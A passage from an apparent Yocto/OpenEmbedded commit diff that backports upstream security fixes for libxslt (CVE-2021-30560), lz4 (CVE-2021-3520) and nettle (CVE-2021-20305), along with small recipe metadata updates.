28xsltApplyStripSpaces wasn't implemented yet. Also note that
29xsltApplyTemplates with a select expression never tried to delete
30nodes.
31
32Also stop xsltDefaultProcessOneNode from deleting nodes for the same
33reasons.
34
35This fixes CVE-2021-30560.
36
37CVE: CVE-2021-30560
38Upstream-Status: Backport [https://github.com/GNOME/libxslt/commit/50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8.patch]
39Comment: No change in any hunk
40Signed-off-by: Omkar Patil <Omkar.Patil@kpit.com>
41
42---
43 libxslt/transform.c | 119 +++-----------------------------------------
44 1 file changed, 7 insertions(+), 112 deletions(-)
45
46diff --git a/libxslt/transform.c b/libxslt/transform.c
47index 04522154..3aba354f 100644
48--- a/libxslt/transform.c
49+++ b/libxslt/transform.c
50@@ -1895,7 +1895,7 @@ static void
51 xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
52 xsltStackElemPtr params) {
53 xmlNodePtr copy;
54- xmlNodePtr delete = NULL, cur;
55+ xmlNodePtr cur;
56 int nbchild = 0, oldSize;
57 int childno = 0, oldPos;
58 xsltTemplatePtr template;
59@@ -1968,54 +1968,13 @@ xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
60 return;
61 }
62 /*
63- * Handling of Elements: first pass, cleanup and counting
64+ * Handling of Elements: first pass, counting
65 */
66 cur = node->children;
67 while (cur != NULL) {
68- switch (cur->type) {
69- case XML_TEXT_NODE:
70- case XML_CDATA_SECTION_NODE:
71- case XML_DOCUMENT_NODE:
72- case XML_HTML_DOCUMENT_NODE:
73- case XML_ELEMENT_NODE:
74- case XML_PI_NODE:
75- case XML_COMMENT_NODE:
76- nbchild++;
77- break;
78- case XML_DTD_NODE:
79- /* Unlink the DTD, it's still reachable using doc->intSubset */
80- if (cur->next != NULL)
81- cur->next->prev = cur->prev;
82- if (cur->prev != NULL)
83- cur->prev->next = cur->next;
84- break;
85- default:
86-#ifdef WITH_XSLT_DEBUG_PROCESS
87- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
88- "xsltDefaultProcessOneNode: skipping node type %d\n",
89- cur->type));
90-#endif
91- delete = cur;
92- }
93+ if (IS_XSLT_REAL_NODE(cur))
94+ nbchild++;
95 cur = cur->next;
96- if (delete != NULL) {
97-#ifdef WITH_XSLT_DEBUG_PROCESS
98- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
99- "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
100-#endif
101- xmlUnlinkNode(delete);
102- xmlFreeNode(delete);
103- delete = NULL;
104- }
105- }
106- if (delete != NULL) {
107-#ifdef WITH_XSLT_DEBUG_PROCESS
108- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
109- "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
110-#endif
111- xmlUnlinkNode(delete);
112- xmlFreeNode(delete);
113- delete = NULL;
114 }
115
116 /*
117@@ -4864,7 +4823,7 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
118 xsltStylePreCompPtr comp = (xsltStylePreCompPtr) castedComp;
119 #endif
120 int i;
121- xmlNodePtr cur, delNode = NULL, oldContextNode;
122+ xmlNodePtr cur, oldContextNode;
123 xmlNodeSetPtr list = NULL, oldList;
124 xsltStackElemPtr withParams = NULL;
125 int oldXPProximityPosition, oldXPContextSize;
126@@ -4998,73 +4957,9 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
127 else
128 cur = NULL;
129 while (cur != NULL) {
130- switch (cur->type) {
131- case XML_TEXT_NODE:
132- if ((IS_BLANK_NODE(cur)) &&
133- (cur->parent != NULL) &&
134- (cur->parent->type == XML_ELEMENT_NODE) &&
135- (ctxt->style->stripSpaces != NULL)) {
136- const xmlChar *val;
137-
138- if (cur->parent->ns != NULL) {
139- val = (const xmlChar *)
140- xmlHashLookup2(ctxt->style->stripSpaces,
141- cur->parent->name,
142- cur->parent->ns->href);
143- if (val == NULL) {
144- val = (const xmlChar *)
145- xmlHashLookup2(ctxt->style->stripSpaces,
146- BAD_CAST "*",
147- cur->parent->ns->href);
148- }
149- } else {
150- val = (const xmlChar *)
151- xmlHashLookup2(ctxt->style->stripSpaces,
152- cur->parent->name, NULL);
153- }
154- if ((val != NULL) &&
155- (xmlStrEqual(val, (xmlChar *) "strip"))) {
156- delNode = cur;
157- break;
158- }
159- }
160- /* Intentional fall-through */
161- case XML_ELEMENT_NODE:
162- case XML_DOCUMENT_NODE:
163- case XML_HTML_DOCUMENT_NODE:
164- case XML_CDATA_SECTION_NODE:
165- case XML_PI_NODE:
166- case XML_COMMENT_NODE:
167- xmlXPathNodeSetAddUnique(list, cur);
168- break;
169- case XML_DTD_NODE:
170- /* Unlink the DTD, it's still reachable
171- * using doc->intSubset */
172- if (cur->next != NULL)
173- cur->next->prev = cur->prev;
174- if (cur->prev != NULL)
175- cur->prev->next = cur->next;
176- break;
177- case XML_NAMESPACE_DECL:
178- break;
179- default:
180-#ifdef WITH_XSLT_DEBUG_PROCESS
181- XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
182- "xsltApplyTemplates: skipping cur type %d\n",
183- cur->type));
184-#endif
185- delNode = cur;
186- }
187+ if (IS_XSLT_REAL_NODE(cur))
188+ xmlXPathNodeSetAddUnique(list, cur);
189 cur = cur->next;
190- if (delNode != NULL) {
191-#ifdef WITH_XSLT_DEBUG_PROCESS
192- XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
193- "xsltApplyTemplates: removing ignorable blank cur\n"));
194-#endif
195- xmlUnlinkNode(delNode);
196- xmlFreeNode(delNode);
197- delNode = NULL;
198- }
199 }
200 }
201
diff --git a/meta/recipes-support/libxslt/libxslt_1.1.34.bb b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
index 1961bb5b31..4755677bec 100644
--- a/meta/recipes-support/libxslt/libxslt_1.1.34.bb
+++ b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
@@ -1,4 +1,9 @@
1SUMMARY = "GNOME XSLT library" 1SUMMARY = "GNOME XSLT library"
2DESCRIPTION = "libxslt is the XSLT C parser and toolkit developed for the Gnome project. \
3XSLT itself is a an XML language to define transformation for XML. Libxslt is based on \
4libxml2 the XML C library developed for the GNOME project. It also implements most of \
5the EXSLT set of processor-portable extensions functions and some of Saxon's evaluate \
6and expressions extensions."
2HOMEPAGE = "http://xmlsoft.org/XSLT/" 7HOMEPAGE = "http://xmlsoft.org/XSLT/"
3BUGTRACKER = "https://bugzilla.gnome.org/" 8BUGTRACKER = "https://bugzilla.gnome.org/"
4 9
@@ -9,6 +14,7 @@ SECTION = "libs"
9DEPENDS = "libxml2" 14DEPENDS = "libxml2"
10 15
11SRC_URI = "http://xmlsoft.org/sources/libxslt-${PV}.tar.gz \ 16SRC_URI = "http://xmlsoft.org/sources/libxslt-${PV}.tar.gz \
17 file://CVE-2021-30560.patch \
12 " 18 "
13 19
14SRC_URI[md5sum] = "db8765c8d076f1b6caafd9f2542a304a" 20SRC_URI[md5sum] = "db8765c8d076f1b6caafd9f2542a304a"
@@ -16,6 +22,10 @@ SRC_URI[sha256sum] = "98b1bd46d6792925ad2dfe9a87452ea2adebf69dcb9919ffd55bf926a7
16 22
17UPSTREAM_CHECK_REGEX = "libxslt-(?P<pver>\d+(\.\d+)+)\.tar" 23UPSTREAM_CHECK_REGEX = "libxslt-(?P<pver>\d+(\.\d+)+)\.tar"
18 24
25# We have libxml2 2.9.10 and we don't link statically with it anyway
26# so this isn't an issue.
27CVE_CHECK_WHITELIST += "CVE-2022-29824"
28
19S = "${WORKDIR}/libxslt-${PV}" 29S = "${WORKDIR}/libxslt-${PV}"
20 30
21BINCONFIG = "${bindir}/xslt-config" 31BINCONFIG = "${bindir}/xslt-config"
diff --git a/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
new file mode 100644
index 0000000000..5ac8f6691f
--- /dev/null
+++ b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
@@ -0,0 +1,27 @@
1From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001
2From: Jasper Lievisse Adriaanse <j@jasper.la>
3Date: Fri, 26 Feb 2021 15:21:20 +0100
4Subject: [PATCH] Fix potential memory corruption with negative memmove() size
5
6Upstream-Status: Backport
7https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7
8CVE: CVE-2021-3520
9Signed-off-by: Armin Kuster <akuster@mvista.com>
10
11---
12 lib/lz4.c | 2 +-
13 1 file changed, 1 insertion(+), 1 deletion(-)
14
15Index: git/lib/lz4.c
16===================================================================
17--- git.orig/lib/lz4.c
18+++ git/lib/lz4.c
19@@ -1665,7 +1665,7 @@ LZ4_decompress_generic(
20 const size_t dictSize /* note : = 0 if noDict */
21 )
22 {
23- if (src == NULL) { return -1; }
24+ if ((src == NULL) || (outputSize < 0)) { return -1; }
25
26 { const BYTE* ip = (const BYTE*) src;
27 const BYTE* const iend = ip + srcSize;
diff --git a/meta/recipes-support/lz4/lz4_1.9.2.bb b/meta/recipes-support/lz4/lz4_1.9.2.bb
index 455d2a5141..bc11a57eb5 100644
--- a/meta/recipes-support/lz4/lz4_1.9.2.bb
+++ b/meta/recipes-support/lz4/lz4_1.9.2.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Extremely Fast Compression algorithm" 1SUMMARY = "Extremely Fast Compression algorithm"
2DESCRIPTION = "LZ4 is a very fast lossless compression algorithm, providing compression speed at 400 MB/s per core, scalable with multi-cores CPU. It also features an extremely fast decoder, with speed in multiple GB/s per core, typically reaching RAM speed limits on multi-core systems." 2DESCRIPTION = "LZ4 is a very fast lossless compression algorithm, providing compression speed at 400 MB/s per core, scalable with multi-cores CPU. It also features an extremely fast decoder, with speed in multiple GB/s per core, typically reaching RAM speed limits on multi-core systems."
3HOMEPAGE = "https://github.com/lz4/lz4"
3 4
4LICENSE = "BSD | BSD-2-Clause | GPL-2.0" 5LICENSE = "BSD | BSD-2-Clause | GPL-2.0"
5LIC_FILES_CHKSUM = "file://lib/LICENSE;md5=ebc2ea4814a64de7708f1571904b32cc \ 6LIC_FILES_CHKSUM = "file://lib/LICENSE;md5=ebc2ea4814a64de7708f1571904b32cc \
@@ -11,8 +12,13 @@ PE = "1"
11 12
12SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd" 13SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd"
13 14
14SRC_URI = "git://github.com/lz4/lz4.git;branch=dev \ 15# remove at next version upgrade or when output changes
16PR = "r1"
17HASHEQUIV_HASH_VERSION .= ".1"
18
19SRC_URI = "git://github.com/lz4/lz4.git;branch=dev;protocol=https \
15 file://run-ptest \ 20 file://run-ptest \
21 file://CVE-2021-3520.patch \
16 " 22 "
17UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)" 23UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
18 24
@@ -21,7 +27,7 @@ S = "${WORKDIR}/git"
21# Fixed in r118, which is larger than the current version. 27# Fixed in r118, which is larger than the current version.
22CVE_CHECK_WHITELIST += "CVE-2014-4715" 28CVE_CHECK_WHITELIST += "CVE-2014-4715"
23 29
24EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no" 30EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' CFLAGS='${CFLAGS}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
25 31
26do_install() { 32do_install() {
27 oe_runmake install 33 oe_runmake install
diff --git a/meta/recipes-support/lzo/lzo_2.10.bb b/meta/recipes-support/lzo/lzo_2.10.bb
index 8eefec3cc9..f0c8631aea 100644
--- a/meta/recipes-support/lzo/lzo_2.10.bb
+++ b/meta/recipes-support/lzo/lzo_2.10.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Lossless data compression library" 1SUMMARY = "Lossless data compression library"
2DESCRIPTION = "A portable lossless data compression library written in \
3ANSI C that offers pretty fast compression and *extremely* fast decompression. "
2HOMEPAGE = "http://www.oberhumer.com/opensource/lzo/" 4HOMEPAGE = "http://www.oberhumer.com/opensource/lzo/"
3SECTION = "libs" 5SECTION = "libs"
4LICENSE = "GPLv2+" 6LICENSE = "GPLv2+"
@@ -16,6 +18,8 @@ SRC_URI[sha256sum] = "c0f892943208266f9b6543b3ae308fab6284c5c90e627931446fb49b42
16 18
17inherit autotools ptest 19inherit autotools ptest
18 20
21CVE_PRODUCT = "lzo oberhumer:lzo2"
22
19EXTRA_OECONF = "--enable-shared" 23EXTRA_OECONF = "--enable-shared"
20 24
21do_install_ptest() { 25do_install_ptest() {
diff --git a/meta/recipes-support/lzop/lzop_1.04.bb b/meta/recipes-support/lzop/lzop_1.04.bb
index b50c230437..59c2003b74 100644
--- a/meta/recipes-support/lzop/lzop_1.04.bb
+++ b/meta/recipes-support/lzop/lzop_1.04.bb
@@ -5,6 +5,7 @@ gzip are much higher compression and decompression speed at the cost of some \n\
5compression ratio. The lzop compression utility was designed with the goals \n\ 5compression ratio. The lzop compression utility was designed with the goals \n\
6of reliability, speed, portability and with reasonable drop-in compatibility \n\ 6of reliability, speed, portability and with reasonable drop-in compatibility \n\
7to gzip." 7to gzip."
8HOMEPAGE = "http://www.lzop.org/"
8DEPENDS += "lzo" 9DEPENDS += "lzo"
9 10
10LICENSE = "GPLv2+" 11LICENSE = "GPLv2+"
diff --git a/meta/recipes-support/mpfr/mpfr_4.0.2.bb b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
index 00c2dc2fe9..0ac73f031f 100644
--- a/meta/recipes-support/mpfr/mpfr_4.0.2.bb
+++ b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
@@ -1,4 +1,5 @@
1SUMMARY = "C library for multiple-precision floating-point computations with exact rounding" 1SUMMARY = "C library for multiple-precision floating-point computations with exact rounding"
2DESCRIPTION = "The GNU Multiple Precision Floating-Point Reliable Library (GNU MPFR) is a GNU portable C library for arbitrary-precision binary floating-point computation with correct rounding, based on GNU Multi-Precision Library. MPFR's computation is both efficient and has a well-defined semantics: the functions are completely specified on all the possible operands and the results do not depend on the platform."
2HOMEPAGE = "https://www.mpfr.org/" 3HOMEPAGE = "https://www.mpfr.org/"
3LICENSE = "LGPLv3+" 4LICENSE = "LGPLv3+"
4SECTION = "devel" 5SECTION = "devel"
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
new file mode 100644
index 0000000000..cfc0f382fa
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
@@ -0,0 +1,215 @@
1Backport of:
2
3From a63893791280d441c713293491da97c79c0950fe Mon Sep 17 00:00:00 2001
4From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
5Date: Thu, 11 Mar 2021 19:37:41 +0100
6Subject: [PATCH] New functions ecc_mod_mul_canonical and
7 ecc_mod_sqr_canonical.
8
9* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
10New functions.
11* ecc-internal.h: Declare and document new functions.
12* curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
13* curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
14* ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
15* ecc-j-to-a.c (ecc_j_to_a): Likewise.
16* ecc-mul-m.c (ecc_mul_m): Likewise.
17
18(cherry picked from commit 2bf497ba4d6acc6f352bca015837fad33008565c)
19
20Upstream-Status: Backport
21https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-1.patch
22CVE: CVE-2021-20305 dep1
23Signed-off-by: Armin Kuster <akuster@mvista.com>
24
25---
26 ChangeLog | 11 +++++++++++
27 curve25519-eh-to-x.c | 6 +-----
28 curve448-eh-to-x.c | 5 +----
29 ecc-eh-to-a.c | 12 ++----------
30 ecc-internal.h | 15 +++++++++++++++
31 ecc-j-to-a.c | 15 +++------------
32 ecc-mod-arith.c | 24 ++++++++++++++++++++++++
33 ecc-mul-m.c | 6 ++----
34 8 files changed, 59 insertions(+), 35 deletions(-)
35
36#diff --git a/ChangeLog b/ChangeLog
37#index fd138d82..5cc5c188 100644
38#--- a/ChangeLog
39#+++ b/ChangeLog
40#@@ -1,3 +1,14 @@
41#+2021-03-11 Niels Möller <nisse@lysator.liu.se>
42#+
43#+ * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
44#+ New functions.
45#+ * ecc-internal.h: Declare and document new functions.
46#+ * curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
47#+ * curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
48#+ * ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
49#+ * ecc-j-to-a.c (ecc_j_to_a): Likewise.
50#+ * ecc-mul-m.c (ecc_mul_m): Likewise.
51#+
52# 2021-02-17 Niels Möller <nisse@lysator.liu.se>
53#
54# * Released Nettle-3.7.1.
55Index: nettle-3.5.1/curve25519-eh-to-x.c
56===================================================================
57--- nettle-3.5.1.orig/curve25519-eh-to-x.c
58+++ nettle-3.5.1/curve25519-eh-to-x.c
59@@ -53,7 +53,6 @@ curve25519_eh_to_x (mp_limb_t *xp, const
60 #define t2 (scratch + 2*ecc->p.size)
61
62 const struct ecc_curve *ecc = &_nettle_curve25519;
63- mp_limb_t cy;
64
65 /* If u = U/W and v = V/W are the coordiantes of the point on the
66 Edwards curve we get the curve25519 x coordinate as
67@@ -69,10 +68,7 @@ curve25519_eh_to_x (mp_limb_t *xp, const
68 ecc->p.invert (&ecc->p, t1, t0, t2 + ecc->p.size);
69
70 ecc_modp_add (ecc, t0, wp, vp);
71- ecc_modp_mul (ecc, t2, t0, t1);
72-
73- cy = mpn_sub_n (xp, t2, ecc->p.m, ecc->p.size);
74- cnd_copy (cy, xp, t2, ecc->p.size);
75+ ecc_mod_mul_canonical (&ecc->p, xp, t0, t1, t2);
76 #undef vp
77 #undef wp
78 #undef t0
79Index: nettle-3.5.1/ecc-eh-to-a.c
80===================================================================
81--- nettle-3.5.1.orig/ecc-eh-to-a.c
82+++ nettle-3.5.1/ecc-eh-to-a.c
83@@ -59,9 +59,7 @@ ecc_eh_to_a (const struct ecc_curve *ecc
84 /* Needs 2*size + scratch for the invert call. */
85 ecc->p.invert (&ecc->p, izp, zp, tp + ecc->p.size);
86
87- ecc_modp_mul (ecc, tp, xp, izp);
88- cy = mpn_sub_n (r, tp, ecc->p.m, ecc->p.size);
89- cnd_copy (cy, r, tp, ecc->p.size);
90+ ecc_mod_mul_canonical (&ecc->p, r, xp, izp, tp);
91
92 if (op)
93 {
94@@ -81,7 +79,5 @@ ecc_eh_to_a (const struct ecc_curve *ecc
95 }
96 return;
97 }
98- ecc_modp_mul (ecc, tp, yp, izp);
99- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
100- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
101+ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, yp, izp, tp);
102 }
103Index: nettle-3.5.1/ecc-internal.h
104===================================================================
105--- nettle-3.5.1.orig/ecc-internal.h
106+++ nettle-3.5.1/ecc-internal.h
107@@ -49,6 +49,8 @@
108 #define ecc_mod_submul_1 _nettle_ecc_mod_submul_1
109 #define ecc_mod_mul _nettle_ecc_mod_mul
110 #define ecc_mod_sqr _nettle_ecc_mod_sqr
111+#define ecc_mod_mul_canonical _nettle_ecc_mod_mul_canonical
112+#define ecc_mod_sqr_canonical _nettle_ecc_mod_sqr_canonical
113 #define ecc_mod_random _nettle_ecc_mod_random
114 #define ecc_mod _nettle_ecc_mod
115 #define ecc_mod_inv _nettle_ecc_mod_inv
116@@ -263,6 +265,19 @@ ecc_mod_sqr (const struct ecc_modulo *m,
117 #define ecc_modq_mul(ecc, r, a, b) \
118 ecc_mod_mul (&(ecc)->q, (r), (a), (b))
119
120+/* These mul and sqr functions produce a canonical result, 0 <= R < M.
121+ Requirements on input and output areas are similar to the above
122+ functions, except that it is *not* allowed to pass rp = rp +
123+ m->size.
124+ */
125+void
126+ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
127+ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp);
128+
129+void
130+ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
131+ const mp_limb_t *ap, mp_limb_t *tp);
132+
133 /* mod q operations. */
134 void
135 ecc_mod_random (const struct ecc_modulo *m, mp_limb_t *xp,
136Index: nettle-3.5.1/ecc-j-to-a.c
137===================================================================
138--- nettle-3.5.1.orig/ecc-j-to-a.c
139+++ nettle-3.5.1/ecc-j-to-a.c
140@@ -51,8 +51,6 @@ ecc_j_to_a (const struct ecc_curve *ecc,
141 #define izBp (scratch + 3*ecc->p.size)
142 #define tp scratch
143
144- mp_limb_t cy;
145-
146 if (ecc->use_redc)
147 {
148 /* Set v = (r_z / B^2)^-1,
149@@ -86,17 +84,14 @@ ecc_j_to_a (const struct ecc_curve *ecc,
150 ecc_modp_sqr (ecc, iz2p, izp);
151 }
152
153- ecc_modp_mul (ecc, iz3p, iz2p, p);
154- /* ecc_modp (and ecc_modp_mul) may return a value up to 2p - 1, so
155- do a conditional subtraction. */
156- cy = mpn_sub_n (r, iz3p, ecc->p.m, ecc->p.size);
157- cnd_copy (cy, r, iz3p, ecc->p.size);
158+ ecc_mod_mul_canonical (&ecc->p, r, iz2p, p, iz3p);
159
160 if (op)
161 {
162 /* Skip y coordinate */
163 if (op > 1)
164 {
165+ mp_limb_t cy;
166 /* Also reduce the x coordinate mod ecc->q. It should
167 already be < 2*ecc->q, so one subtraction should
168 suffice. */
169@@ -106,10 +101,7 @@ ecc_j_to_a (const struct ecc_curve *ecc,
170 return;
171 }
172 ecc_modp_mul (ecc, iz3p, iz2p, izp);
173- ecc_modp_mul (ecc, tp, iz3p, p + ecc->p.size);
174- /* And a similar subtraction. */
175- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
176- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
177+ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, iz3p, p + ecc->p.size, iz3p);
178
179 #undef izp
180 #undef up
181Index: nettle-3.5.1/ecc-mod-arith.c
182===================================================================
183--- nettle-3.5.1.orig/ecc-mod-arith.c
184+++ nettle-3.5.1/ecc-mod-arith.c
185@@ -119,6 +119,30 @@ ecc_mod_mul (const struct ecc_modulo *m,
186 }
187
188 void
189+ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
190+ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp)
191+{
192+ mp_limb_t cy;
193+ mpn_mul_n (tp + m->size, ap, bp, m->size);
194+ m->reduce (m, tp + m->size);
195+
196+ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
197+ cnd_copy (cy, rp, tp + m->size, m->size);
198+}
199+
200+void
201+ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
202+ const mp_limb_t *ap, mp_limb_t *tp)
203+{
204+ mp_limb_t cy;
205+ mpn_sqr (tp + m->size, ap, m->size);
206+ m->reduce (m, tp + m->size);
207+
208+ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
209+ cnd_copy (cy, rp, tp + m->size, m->size);
210+}
211+
212+void
213 ecc_mod_sqr (const struct ecc_modulo *m, mp_limb_t *rp,
214 const mp_limb_t *ap)
215 {
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
new file mode 100644
index 0000000000..bb56b14c8c
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
@@ -0,0 +1,53 @@
1Backport of:
2
3From 971bed6ab4b27014eb23085e8176917e1a096fd5 Mon Sep 17 00:00:00 2001
4From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
5Date: Sat, 13 Mar 2021 17:26:37 +0100
6Subject: [PATCH] Use ecc_mod_mul_canonical for point comparison.
7
8* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
9
10(cherry picked from commit 5b7608fde3a6d2ab82bffb35db1e4e330927c906)
11
12Upstream-Status: Backport
13https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-2.patch
14CVE: CVE-2021-20305 dep2
15Signed-off-by: Armin Kuster <akuster@mvista.com>
16
17---
18 ChangeLog | 4 ++++
19 eddsa-verify.c | 9 ++-------
20 2 files changed, 6 insertions(+), 7 deletions(-)
21
22#diff --git a/ChangeLog b/ChangeLog
23#index 5cc5c188..2a9217a6 100644
24#--- a/ChangeLog
25#+++ b/ChangeLog
26#@@ -1,3 +1,7 @@
27#+2021-03-13 Niels Möller <nisse@lysator.liu.se>
28#+
29#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
30#+
31# 2021-03-11 Niels Möller <nisse@lysator.liu.se>
32#
33# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
34Index: nettle-3.5.1/eddsa-verify.c
35===================================================================
36--- nettle-3.5.1.orig/eddsa-verify.c
37+++ nettle-3.5.1/eddsa-verify.c
38@@ -53,13 +53,8 @@ equal_h (const struct ecc_modulo *p,
39 #define t0 scratch
40 #define t1 (scratch + p->size)
41
42- ecc_mod_mul (p, t0, x1, z2);
43- if (mpn_cmp (t0, p->m, p->size) >= 0)
44- mpn_sub_n (t0, t0, p->m, p->size);
45-
46- ecc_mod_mul (p, t1, x2, z1);
47- if (mpn_cmp (t1, p->m, p->size) >= 0)
48- mpn_sub_n (t1, t1, p->m, p->size);
49+ ecc_mod_mul_canonical (p, t0, x1, z2, t0);
50+ ecc_mod_mul_canonical (p, t1, x2, z1, t1);
51
52 return mpn_cmp (t0, t1, p->size) == 0;
53
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
new file mode 100644
index 0000000000..15a892ecdf
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
@@ -0,0 +1,122 @@
1Backport of:
2
3From 74ee0e82b6891e090f20723750faeb19064e31b2 Mon Sep 17 00:00:00 2001
4From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
5Date: Sat, 13 Mar 2021 15:19:19 +0100
6Subject: [PATCH] Fix bug in ecc_ecdsa_verify.
7
8* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
9to compute the scalars used for ecc multiplication.
10* testsuite/ecdsa-verify-test.c (test_main): Add test case that
11triggers an assert on 64-bit platforms, without above fix.
12* testsuite/ecdsa-sign-test.c (test_main): Test case generating
13the same signature.
14
15(cherry picked from commit 2397757b3f95fcae1e2d3011bf99ca5b5438378f)
16
17Upstream-Status: Backport
18https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-3.patch
19CVE: CVE-2021-20305 dep3
20[Minor fixup on _nettle_secp_224r1]
21Signed-off-by: Armin Kuster <akuster@mvista.com>
22
23---
24 ChangeLog | 10 +++++++++-
25 ecc-ecdsa-verify.c | 4 ++--
26 testsuite/ecdsa-sign-test.c | 13 +++++++++++++
27 testsuite/ecdsa-verify-test.c | 20 ++++++++++++++++++++
28 4 files changed, 44 insertions(+), 3 deletions(-)
29
30#diff --git a/ChangeLog b/ChangeLog
31#index 2a9217a6..63848f53 100644
32#--- a/ChangeLog
33#+++ b/ChangeLog
34#@@ -1,7 +1,15 @@
35# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
36#
37#- * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
38#+ * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
39#+ to compute the scalars used for ecc multiplication.
40#+ * testsuite/ecdsa-verify-test.c (test_main): Add test case that
41#+ triggers an assert on 64-bit platforms, without above fix.
42#+ * testsuite/ecdsa-sign-test.c (test_main): Test case generating
43#+ the same signature.
44#+
45#+2021-03-13 Niels Möller <nisse@lysator.liu.se>
46#
47#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
48# 2021-03-11 Niels Möller <nisse@lysator.liu.se>
49#
50# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
51Index: nettle-3.5.1/ecc-ecdsa-verify.c
52===================================================================
53--- nettle-3.5.1.orig/ecc-ecdsa-verify.c
54+++ nettle-3.5.1/ecc-ecdsa-verify.c
55@@ -112,10 +112,10 @@ ecc_ecdsa_verify (const struct ecc_curve
56
57 /* u1 = h / s, P1 = u1 * G */
58 ecc_hash (&ecc->q, hp, length, digest);
59- ecc_modq_mul (ecc, u1, hp, sinv);
